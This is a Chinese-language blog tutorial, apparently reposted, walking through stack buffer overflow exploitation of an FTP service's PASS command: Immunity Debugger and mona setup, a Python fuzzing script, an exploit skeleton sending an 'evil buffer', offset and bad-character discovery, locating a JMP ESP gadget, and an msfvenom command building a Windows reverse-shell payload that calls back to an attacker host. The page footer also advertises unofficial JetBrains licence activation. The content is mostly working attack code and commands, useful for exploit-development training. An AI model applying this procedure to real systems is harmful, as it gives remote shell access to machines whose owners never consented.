缓冲区溢出流程

缓冲区溢出流程缓冲区溢出流程一、ImmunityDebugger最好以管理员的身份运行Innunitydebugger通常有两种方法可以使用ImmunityDebugger来调试应用程序:确保应用

大家好,又见面了,我是你们的朋友全栈君。

缓冲区溢出流程

一、Immunity Debugger

  • 最好以管理员的身份运行Innunity debugger

  • 通常有两种方法可以使用 Immunity Debugger 来调试应用程序:

  1. 确保应用程序正在运行,打开 Immunity Debugger,然后使用File -> Attach调试器攻击正在运行的进程。
  2. 打开 Immunity Debugger,然后使用它File -> Open来运行应用程序。
  • 在 Immunity Debugger 中附加到应用程序或打开应用程序时,应用程序将被暂停。单击“运行”按钮或按 F9。

二、mona

Mona 是一个强大的 Immunity Debugger 插件,可以更轻松地利用缓出。下载::download:mona.py <../_static/files/mona.py>

最新版本可以在这里下载:https : //github.com/corelan/mona

这里找到:https : //www.corelan.be/index.php/2011/07/14/mona-py-the-manual/

将 mona.py 文件复制到 Immunity Debugger 的 PyCommands 目录(通常位于C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands)。

在 Immunity Debugger 中,键入以下内容以设置 mona 的工作目录。

!mona config -set workingfolder c:\mona\%p

三、模糊测试

  • 可以修改以下 Python 脚本,它将发送越来越长的缓冲区字符串,最终使应用程序崩溃。
import socket, time, sys

ip = "MACHINE_IP" //目标IP
port = 21  
timeout = 5

# Create an array of increasing length buffer strings.
buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append("A" * counter)
    counter += 100

for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        connect = s.connect((ip, port))
        s.recv(1024)
        s.send("USER username\r\n")
        s.recv(1024)

        print("Fuzzing PASS with %s bytes" % len(string))
        s.send("PASS " + string + "\r\n")
        s.recv(1024)
        s.send("QUIT\r\n")
        s.recv(1024)
        s.close()
    except:
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)

  • 检查 EIP 寄存器是否已被 A (\x41) 覆盖,并记下使崩溃发送的字节长度

四、控制EIP

以下python漏洞利用代码可用于缓冲区溢出漏洞利用的其余部分:

import socket

ip = "10.0.0.1"   //目标IP
port = 21

prefix = ""
offset = 0  //EIP偏移量
overflow = "A" * offset   //无意义的填充物
retn = ""     //ESP跳板
padding = ""  //nop缓冲区(至少/x90 *16)
payload = ""  //恶意代码
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")
    print("Done!")
except:
    print("Could not connect.")

寻找EIP

  • 使用导致崩溃的缓冲区长度,生成一个唯一的缓冲区,以便我们可以确定覆盖 EIP 寄存器的模式中的偏移量,以及其他寄存器指向的模式中的偏移量。创建一个比崩溃缓冲区大 400 字节的模式,以便我们可以确定我们的 shellcode 是否可以立即适应。
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600    //应该将600修改为比缓冲区崩溃长度大400字节的数字
  • 使用 mona 的 findmsp 命令,并将距离参数设置为比缓冲区崩溃大400的数字,确定EIP偏移量
!mona findmsp -distance 600   //600应该更改
  • 或者在攻击机机器里使用下面的命令来确定EIP偏移量
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134   //后面的数字是EIP的值

五、查找坏字符

  • 使用 mona 生成字节数组,并默认排除空字节 (\x00)。请注意生成的 bytearray.bin 文件的位置

!mona bytearray -b "\x00"

  • 现在生成一串与字节数组相同的坏字符。以下 python 脚本可用于生成从 \x01 到 \xff 的坏字符字符串:
#!/usr/bin/env python
from __future__ import print_function

for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')

print()

  • 使用 mona compare 命令引用你生成的字节数组,以及 ESP 指向的地址:
!mona compare -f C:\mona\appname\bytearray.bin -a <esp地址>  
  • 使用Ctrl + F4组合键可以查看之前找到的坏字符
  • 注意:应该逐个排除坏字符,因为前一个坏字符可能会影响到后一个,导致好的字符被误判为坏字符

六、寻找跳板(ESP)

  • 使用以下指令寻找ESP,并且确保不会出现坏字符:

!mona jmp -r esp -cpb " " //引号内的是坏字符

  • 会显示多个ESP结果,都行,记下地址,写到代码中时地址要反过来写,因为进出顺序不同

七、生成有效载荷

  • 使用 msfvenom 生成反向 shell 负载,确保排除之前发现的相同错误字符:
msfvenom -p windows/shell_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f py -v payload

-p 载荷类型
LHOST 本机地址
LPORT
-b 坏字符
-f 编译的语言
-v 载荷的名称
  • 注意:生成的载荷是字节类型的,放入python3脚本的时候可能需要转换成字符串类型

八、预先准备 NOP

  • 如果使用了编码器(如果存在错误字符的可能性很大,请记住在有效负载之前至少添加 16 个 NOP (\x90)。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/155791.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • orchard core中文_MySQL comment

    orchard core中文_MySQL commentOrchardCore是基于ASP.NETCore开发的一个开源、多租户、模块化的应用程序框架OrchardCoreFramework,同时也构建了一套内容管理系统(CMS)OrchardCoreCMS。历史OrchardCore是对基于.NETFramework的OrchardCMS系统的在ASP.NETCore上重新设计和实现。OrchardCMS是基于SP.NE…

    2022年10月26日
  • C语言再学习 — 关键字volatile

    C语言再学习 — 关键字volatile占楼

  • Autoencoder自动编码器的发展

    Autoencoder自动编码器的发展Autoencoder自动编码器的发展0、玻尔兹曼机中的测试实验——编码问题(1985)0.1、玻尔兹曼机0.2、受限的玻尔兹曼机0.3、编码问题——自动编码器雏形1、反向传播中的仿真——单层自动编码器(1986)2、利用神经网络进行数据降维——深度自动编码器(2006)3、去噪自编码器(2008)4、稀疏自编码器(2011)5、卷积自编码器(2011)6、变分自编码器(2013)6.1、模型6….

  • mybatis开发dao两种方法

    mybatis开发dao两种方法mybatis是一个支持普通SQL查询,存储过程和高级映射的优秀的持久层的框架,是apache下的顶级项目。mybatis消除了几乎所有的JDBC代码和参数的手工设置以及对结果集的检索封装。mybatis可以使用简单的XML或注解用于配置和原始映射,将接口和Java的POJO映射成数据库中的记录。其中,开发dao有两种方法,一种原始的dao开发方法,程序员需要写dao接口和dao实现类。另一种…

  • Jmeter 之正则表达式提取器应用「建议收藏」

    Jmeter 之正则表达式提取器应用「建议收藏」目录前言一、获取单个数据二、获取多个数据个人觉得非常非常细节的地方注意一下:前言说到Jmeter正则表达式提取器的应用,就不得不说到关联。所谓关联,就是把应用中动态变化返回的数据获取到,把它保存为一个参数,提供给后面需要用到的地方进行使用。Jmeter中关联可以通过“添加—后置处理器—正则表达式提取器”来获取数据,且注意正则表达式提取器附在需要获取数据的某个采样器之下,数据一般从“查看结果树“的响应数据获取。Jmeter中关联可以通过“添加—后置处理器—正则表达式提.

  • SLAM算法总结——经典SLAM算法框架总结

    SLAM算法总结——经典SLAM算法框架总结SLAM算法总结——经典SLAM算法框架总结SLAM算法总结——经典SLAM算法框架总结SLAM算法总结——经典SLAM算法框架总结从研究生接触SLAM算法到现在也有

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号